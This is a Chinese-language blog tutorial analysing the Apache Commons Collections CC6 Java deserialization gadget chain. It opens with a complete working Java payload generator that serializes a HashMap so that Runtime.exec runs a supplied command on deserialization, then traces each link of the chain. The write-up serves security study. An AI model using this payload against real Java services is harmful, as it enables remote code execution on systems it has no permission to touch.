java反序列化---cc6链

已于 2024-06-15 00:04:04 修改
阅读量872 收藏 25
点赞数 18
分类专栏: 安全 文章标签: java 安全
于 2024-06-15 00:03:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CQ17743254852/article/details/139692000
版权

目录

Transformer[]数组分析

链条代码跟进

ChainedTransformer.transform()

LazyMap.get()

TiedMapEntry.getValue()

TiedMapEntry.hashCode()

HashMap.hash()

HashMap.put()的意外触发

LazyMap.get()中key的包含问题

cc6的payload如下

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections6 {
    public byte[] getPayload(String command) throws Exception {
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { command }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
        
		// 不再使用原CommonsCollections6中的HashSet,直接使用HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");

        outerMap.remove("keykey");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        return barr.toByteArray();
    }
}

Transformer[]数组分析

首先不看第一行的faketransformer,直接来看第二个数组

数组内new了5个对象,咱们分别来说

1.

new ConstantTransformer(Runtime.class),

咱们跟进这个对象,可以看到就只是将Runtime.class,也就是Runtime这个类的字节码,赋值给到这个对象的iconstant字段

2.

new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),

 这里就不说了,三个赋值

主要是这里,先不管能不能调用到transform这个方法,我们先来看这个方法到底干了什么,首先getClass()拿到对应的对象字节码,然后通过getMethod()拿到方法,之后通过invoke调用

假如可以调用这个transform方法,把我们的参数传进入会发生什么?

这里的input值不知道那就先不看,这里的意思就是,先拿到这个对象的getMethod方法,然后进行调用,也就是再通过getMethod方法获取到了getRuntime这个方法,这里可能有点混,看不懂的小伙伴仔细想想或者调试

 3.

new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),

方法名与第二个一样,所以咱可以大胆的猜测这里的意思是使用invoke方法调用某个方法 xxx.invoke('null'),这里有一点注意,当invoke调用静态方法时,第一个参数永远为空  

4.

new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { command }),

同上,这里的意思是拿到exec方法,并且传参command(main方法里的command参数为calc.exe)

5.

new ConstantTransformer(1),

方法名与第一个相同,这里的意思我猜测应该是回到初始状态,并没有什么实际作用

链条代码跟进

ChainedTransformer.transform()

Transformer transformerChain = new ChainedTransformer(fakeTransformers);

这里我们先不管这个fakeTransformers,跟进ChainedTransformer方法,就只是将参数赋值给到iTransformer数组

我们应该注意的是它下面的代码,transform这个方法,代码具体意思是将iTransformer这个数组遍历,然后递归调用

先不管我们能不能调用这个transform方法,假如我们能调用,那么iTransformer[0]~[4]是否就代表了我们上面提到的那5点

首先来看iTransformer[0].transform(),返回iContant这个字段值,即为Runtime.class

 

此时object的值为Runtime.class,然后到iTransformer[1].transform(),即InvokerTransformer.transform(),是不是很熟悉?那正是我们之前分析过的,而之前的input值也变成了现在的Runtime.class,所以返回值为Runtime.getRuntime()

此时object的值为Runtime.class.getRuntime()接着iTransformer[2].transform(),返回值为Runtime.class.getRuntime().invoke()

iTransformer[3].transform()的返回值为Runtime.class.getRuntime().invoke().exec(command)

所以咱们的payload能够完美地触发,但问题是要想执行payload,就必须触发ChainedTransformer.transform()方法

整理一下链条

Runtime.getRuntime().exec()----->InvokerTransformer.transform----->ConstantTransformer.transform----->ChainedTransformer.transform()

LazyMap.get()

接下来就需要我们的LazyMap上场了

Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformerChain);

首先new了一个HashMap,然后再调用LazyMap.decorate()方法,那就跟进decorate方法

 再跟LazyMap构造方法

可以看到最终是将factory赋值为我们的transformerChain,那就找谁用了factory  

终于在LazyMap.get()方法里找到了,并且刚好有我们需要的transform方法,也就是说,这里的factory.transform就等于ChainedTransformer.transform(),那如果谁能调用LazyMap.get()方法,那就能触发我们的payload

TiedMapEntry.getValue()

TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

 跟进构造函数后发现依然是我们熟悉的赋值,map已经为LazyMap了,那就寻找谁调用了get方法

一番寻找后,发现TiedMapEntry.getValue()可以触发  

到这里,我们整理一下链条

Runtime.getRuntime().exec()----->InvokerTransformer.transform----->ConstantTransformer.transform----->ChainedTransformer.transform()----->LazyMap.get()----->TiedMapEntry.getValue()

TiedMapEntry.hashCode()

寻找谁能调用TiedMapEntry.getValue(),TiedMapEntry.hashCode方法就可以

再找谁能调用TiedMapEntry.hashCode()

HashMap.hash()

Map expMap = new HashMap();
expMap.put(tme, "valuevalue");

 跟进代码,就是将tme作为键,"valuevalue"作为值

此时key为TiedMapEntry,所以就找谁调用了hashcode方法

刚好HashMap.hash()调用了hashcode方法,更巧的是此时hashmap的readobject方法又调用了hash这个方法,那这样一切都清楚了,当java反序列化我们的构造好的序列化字符串时,调用了hashmap的readobject方法,便直接触发了我们的payload

最后整理一下链条

Runtime.getRuntime().exec()<-----InvokerTransformer.transform<-----ConstantTransformer.transform<-----ChainedTransformer.transform()<-----LazyMap.get()<-----TiedMapEntry.getValue()<-----TiedMapEntry.hashCode()<-----HashMap.hash()<-----HashMap.readObject()

cc链所有的链条都清楚了,但真的完了吗?

HashMap.put()的意外触发

也许还有小伙伴记得前面的fakeTransformers,这里的fakeTransformers到底是干嘛的?

我们不妨去掉它试试,将之前传入的fakeTransformers改为我们的payload数组

Transformer transformerChain = new ChainedTransformer(transformers);

可以看到在改为我们的payload数组运行后,计算器直接弹出了,这是为什么?

按理来说并不应该触发,因为我们还没有进行反序列化,也就是还没有调用HashMap的readObject方法,也就不应该执行我们的payload,这是为什么呢?

这是因为HashMap.put()方法也调用了hash这个方法,导致我们的payload提前执行

而fakeTransformers解决了我们这个问题

Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(transformerChain, transformers);

 先传入一个假的数组,让代码不执行任何payload,然后再通过反射修改ChainedTransformer类里面的iTransformers值,改为我们的payload,这样就不会意外触发了

LazyMap.get()中key的包含问题

最后还有一个问题,那就是这里的key为什么必须删掉?

outerMap.remove("keykey");

 来到LazyMap.get()方法,这里有一个if条件,如果此时map里面包含了传进来的这个key,那就会直接返回值,不会调用transform方法了,所以我们要避免这样的情况

Catherines7
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cc6
lylong0703的博客
02-12 2779
cc6
treinaweb-java-web-fundamentos:TreinaWeb的“ Java-Web基础知识”课程中生成的代码存储库
04-30
TreinaWeb:“ Java-Web基础知识”课程 存储库,其中包含在“ Java-Web基础知识”课程中生成的代码。 本课程中使用的工具: 日蚀氧气3 Java JDK 10 MySQL 8.0 / MySQL工作台6.3 提交清单 杂凑 描述 4ff290a94b...
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
CC6
..
10-27 786
因为JDK8u71后,Java 官方修改了 sun.reflect.annotation.AnnotationInvocationHandler 的readObject函数++ Class
[Java安全入门]五.CC6
qq_34942239的博客
03-12 545
上一篇讲到CC1是利用AnnotationInvocationHandler来触发setValue(),但是在Java 8u71以后AnnotationInvocationHandler的readObject()里面已经没有了setValue()方法,cc6不受jdk版本约束,较于其他cc,更为通用。
Javaweb安全——反序列化漏洞-CC6
weixin_43610673的博客
06-01 795
本文环境为 JDK8u11现在开始学习,Java 8u71之后,即高版本Java利用,从CommonCollections6开始在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的 通过去触发get方法直接搜get,找到方法 查找其调用,跟踪到方法 要
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
12-09
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
swift-SwiftyOAuth一个用于iOS应用中的简单OAuth库
08-15
SwiftyOAuth的源码(如delba-SwiftyOAuth-cc6ec13)中包含了详细的实现细节,包括HTTP请求的处理、错误处理机制以及如何扩展新Provider等。开发者可以通过阅读源码来深入理解其工作原理,也可以根据自己的需求进行...
ST-GCN基于图卷积的行为识别修改模型文件
10-28
例如,2.jpg、cc6d4fc540bb54cd345152d0e9e39d54.jpg、f1d2e94ea6244ee4fe744ef1ad8a237e.jpg、dbd71fafbcfc42987daaf69c3702e7a4.jpg这些文件可能展示了人体骨架数据的可视化,或者网络架构的图表。 总的来说,ST-...
phonegap-phonegap-1.0.0-0-g80cc6dd.zip
09-21
这种开发方式极大地降低了开发多平台应用的门槛,因为开发者只需要熟悉Web开发即可,而不需要学习多种原生平台的开发语言,如Objective-C(iOS)、Java(Android)等。 在“phonegap-phonegap-80cc6dd”这个压缩包...
CC6利用链分析
qq_45766062的博客
08-19 1361
图片转存失败,源站可能有防盗机制,建议将图片保存下来直接上传(img-yCUl53uz-1660883653803)(/Users/kento/Library/Application Support/typora-user-images/image-20220819122923400.png)]但是到这里一步大家会发现,这里由于在序列化的时候本地执行了命令,所以,在反序列化的时候是失败的。相比较于cc1,cc6主要用的多一点的原因就是兼容高版本jdk。然后在反序列化之前再修改过来,这里可以通过。
java最好用的一条-CC6
qq_62540010的博客
03-25 291
hashcode的作用是为了用来在散列存储结构中确定对象的存储地址的,是为了查找更加方便,以及和equals方法的区别,两个对象的hashcode相等并不一定相等,但equals相等就一定相等。hashcode就是一个对象在hash表中的位置,他并不等同一个对象的物理地址,是对象的物理地址经过hash算法后才产生的hashcode,具体可以搜索这类文章。
CC6链分析与复现
weixin_42974824的博客
08-18 665
CC6链分析与复现
Java反序列化漏洞-CC6利用链分析
柠檬i的博客
12-26 1335
经过之前对[CC1]的分析,现在已经对反序列化利用有了初步的认识,这次来分析一个最好用的CC利用——CC6。 为什么CC6是最好用的CC利用,因为CC6不限制jdk版本,只要commons collections 小于等于3.2.1,都存在这个漏洞。
java反序列化 cc6 分析
m0_64815693的博客
04-22 1070
java反序列化 cc6 分析
11-java安全——java反序列化CC5和CC6链分析
网络安全
07-25 1843
CC5链分析 复习LazyMap利用: https://blog.csdn.net/qq_35733751/article/details/118462281 在学习CC2时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1中LazyMap的get方法已经无法使用,CC5使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类
CC6分析与利用超详细
最新发布
2301_79700060的博客
06-28 1151
经过之前对的分析,感觉自己对反序列化也有了个比较清晰的认知。分析了这两条子后就该分析CC6了,这条子不受jdk的版本影响,并且只要commons collections 小于等于3.2.1,都存在这个漏洞。
搭建一个java反序列化靶场
热门推荐
leeezp的博客
09-09 32万+
java反序列化漏洞研究需要。搭建一个java反序列化靶场。
扮演一名大四学生,讲解以下代码爬取了什么东西 def detail_parse(self, response): fields = response.meta['fields'] if '(.*?)' in '<p data-v-cc6b2756>厂商:(.*?)</p>': fields["changshang"] = re.findall(r'<p data-v-cc6b2756>厂商:(.*?)</p>', response.text, re.S)[0].strip() else: if 'changshang' != 'xiangqing' and 'changshang' != 'detail' and 'changshang' != 'pinglun': fields["changshang"] = self.remove_html(response.css('<p data-v-cc6b2756>厂商:(.*?)</p>').extract_first()) else: fields["changshang"] = emoji.demojize(response.css('<p data-v-cc6b2756>厂商:(.*?)</p>').extract_first()) if '(.*?)' in '<p data-v-cc6b2756>油耗:(.*?)</p>': fields["youhao"] = re.findall(r'<p data-v-cc6b2756>油耗:(.*?)</p>', response.text, re.S)[0].strip() else: if 'youhao' != 'xiangqing' and 'youhao' != 'detail' and 'youhao' != 'pinglun': fields["youhao"] = self.remove_html(response.css('<p data-v-cc6b2756>油耗:(.*?)</p>').extract_first()) else: fields["youhao"] = emoji.demojize(response.css('<p data-v-cc6b2756>油耗:(.*?)</p>').extract_first()) if '(.*?)' in '<p data-v-cc6b2756>排量:(.*?)</p>': fields["pailiang"] = re.findall(r'<p data-v-cc6b2756>排量:(.*?)</p>', response.text, re.S)[0].strip() else: if 'pailiang' != 'xiangqing' and 'pailiang' != 'detail' and 'pailiang' != 'pinglun': fields["pailiang"] = self.remove_html(response.css('<p data-v-cc6b2756>排量:(.*?)</p>').extract_first()) else: fields["pailiang"] = emoji.demojize(response.css('<p data-v-cc6b2756>排量:(.*?)</p>').extract_first()) return fields
05-10
这段代码是爬取某个网站的汽车信息,并在每个汽车的详情页面中爬取厂商、油耗和排量等信息。具体来说,这个函数的输入参数是爬虫请求的响应(response),其中包含需要爬取的汽车信息。函数的输出是一个包含了厂商、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值